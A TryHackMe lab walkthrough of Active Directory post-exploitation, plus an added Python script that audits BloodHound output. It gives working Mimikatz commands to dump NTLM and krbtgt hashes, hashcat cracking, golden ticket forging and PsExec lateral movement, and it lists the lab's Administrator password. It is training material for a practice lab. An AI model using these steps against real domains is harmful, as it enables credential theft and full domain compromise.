Post-Exploitation Basics

Room Link: https://tryhackme.com/room/postexploit

Presteps for Lab

SharpHound Installation

SharpHound version on the box is too old for the current version of Bloodhound so I had to update it.

Kali

git clone https://github.com/BloodHoundAD/BloodHound.git

scp -r BloodHound/Collectors/SharpHound.ps1 Administrator@$VICTIM:C:/Users/Administrator/
Password: P@$$W0rd

Added this line to SharpHound.ps1 before transferring so I could run the command right away

Victim

powershell -ep bypass
.\SharpHound.ps1

BloodHound Installation

apt-get install bloodhound
neo4j console

Enumeration w/ PowerView

Kali

ssh Administrator@$VICTIM
Password: P@$$W0rd

Victim

Run the commands below to load PowerView into the session so its cmdlets are available.

powershell -ep bypass
. .\Downloads\PowerView.ps1

Enumerate the domain users.

Get-NetUser | select cn

Enumerate the domain groups.

Get-NetGroup -GroupName *admin*

Find shared folders.

Invoke-ShareFinder

Get the operating systems of the computers on the network.

Get-NetComputer -fulldata | select operatingsystem

Enumeration w/ Bloodhound

Set up SharpHound and collect the loot for BloodHound.

Victim

powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

Transfer the BloodHound results back to Kali; SCP can be used here.

Kali

scp Administrator@$VICTIM:C:/Users/Administrator/20230212071833_loot.zip loot.zip
Password: P@$$W0rd

Mapping the network w/ BloodHound

bloodhound --no-sandbox

We can just drag the zip file onto the BloodHound window to import it.

Use the pre-built queries in the Analysis tab:

Find all Domain Admins

List all Kerberoastable accounts
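The two queries above can also be answered offline from the loot.zip that SharpHound produced, which is handy for auditing the same exposures (who is in Domain Admins, which enabled accounts carry an SPN) without the GUI. This is an added example, not code from the room or from the BloodHound project; the JSON layout (SharpHound v4 users.json/groups.json with "data", "ObjectIdentifier", "Properties" and group "Members") and the placeholder SID are assumptions.

```python
import io
import json
import zipfile

# Constructed sample in the shape of a SharpHound loot.zip (assumed v4 layout); SIDs are placeholders.
DOMAIN = "CONTROLLER.LOCAL"
SID = "S-1-5-21-PLACEHOLDER"
USERS = {"data": [
    {"ObjectIdentifier": f"{SID}-500", "Properties": {"name": f"ADMINISTRATOR@{DOMAIN}",
     "enabled": True, "hasspn": False, "admincount": True}},
    {"ObjectIdentifier": f"{SID}-1104", "Properties": {"name": f"SQLSERVICE@{DOMAIN}",
     "enabled": True, "hasspn": True, "admincount": True}},
    {"ObjectIdentifier": f"{SID}-1105", "Properties": {"name": f"SVC-OLD@{DOMAIN}",
     "enabled": False, "hasspn": True, "admincount": False}},
], "meta": {"type": "users", "count": 3, "version": 4}}
GROUPS = {"data": [
    {"ObjectIdentifier": f"{SID}-512", "Properties": {"name": f"DOMAIN ADMINS@{DOMAIN}"},
     "Members": [{"ObjectIdentifier": f"{SID}-500", "ObjectType": "User"},
                 {"ObjectIdentifier": f"{SID}-1104", "ObjectType": "User"},
                 {"ObjectIdentifier": f"{SID}-1106", "ObjectType": "Group"}]},
], "meta": {"type": "groups", "count": 1, "version": 4}}

def build_loot_zip() -> bytes:
    """Pack the sample the way SharpHound does: timestamp-prefixed JSON files inside a zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("20230212071833_users.json", json.dumps(USERS))
        zf.writestr("20230212071833_groups.json", json.dumps(GROUPS))
    return buf.getvalue()

def load(zip_bytes: bytes, kind: str) -> list:
    """Return the 'data' list from the <timestamp>_<kind>.json member of the zip."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = next(n for n in zf.namelist() if n.endswith(f"_{kind}.json"))
        return json.loads(zf.read(name))["data"]

def domain_admins(zip_bytes: bytes) -> list:
    """Direct user members of Domain Admins, matched on the well-known RID 512 rather than the name."""
    names = {u["ObjectIdentifier"]: u["Properties"]["name"] for u in load(zip_bytes, "users")}
    da = next(g for g in load(zip_bytes, "groups") if g["ObjectIdentifier"].endswith("-512"))
    return sorted(names.get(m["ObjectIdentifier"], m["ObjectIdentifier"])
                  for m in da["Members"] if m["ObjectType"] == "User")

def kerberoastable(zip_bytes: bytes) -> list:
    """Enabled accounts with an SPN; disabled ones are skipped, admincount marks which to fix first."""
    hits = [u["Properties"] for u in load(zip_bytes, "users")
            if u["Properties"].get("hasspn") and u["Properties"].get("enabled")]
    return sorted((p["name"], bool(p.get("admincount"))) for p in hits)
```

Nested group members are skipped here, so a real audit would also walk group-in-group membership before trusting the Domain Admins list.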

Dumping hashes w/ mimikatz

Kali

ssh Administrator@$VICTIM
Password: P@$$W0rd

Victim

cd Downloads && mimikatz.exe

Victim - Mimikatz

privilege::debug
lsadump::lsa /patch

Copy the output back to Kali.

Extract only the NTLM hashes, strip the surrounding whitespace and duplicates, and write them to a new file.

Kali

grep NTLM hashes.txt | awk -F ':' '{gsub(/^[ \t]+/, "", $2); if ($2 != "") print $2}' | sort -u > hash.txt

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show

Golden Ticket Attacks w/ mimikatz

Kali

ssh Administrator@$VICTIM
Password: P@$$W0rd

Dump the krbtgt Hash

Victim

cd downloads && mimikatz.exe

This dumps the NTLM hash and the domain SID of the krbtgt (Kerberos Ticket Granting Ticket) account, which are what a golden ticket is forged from. Take note of the SID and the NTLM hash in the output; you'll need both to create the golden ticket.

Victim - Mimikatz

privilege::debug
lsadump::lsa /inject /name:krbtgt

Create a Golden Ticket

Victim - Mimikatz

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

Use the Golden Ticket to access other machines

This opens a new command prompt that carries the golden ticket, giving it elevated access to every machine in the domain.

Victim - Mimikatz

misc::cmd

This doesn't actually work because of how TryHackMe is set up, but you would then be able to access other machines. In the example below you'd need to find out what other machines exist to pull this off.

Victim

dir \\Desktop-1\c$
PsExec.exe \\Desktop-1 cmd.exe

Enumeration w/ Server Manager

Kali

rdesktop -d CONTROLLER -u Administrator $VICTIM
Password: P@$$W0rd

Open Active Directory
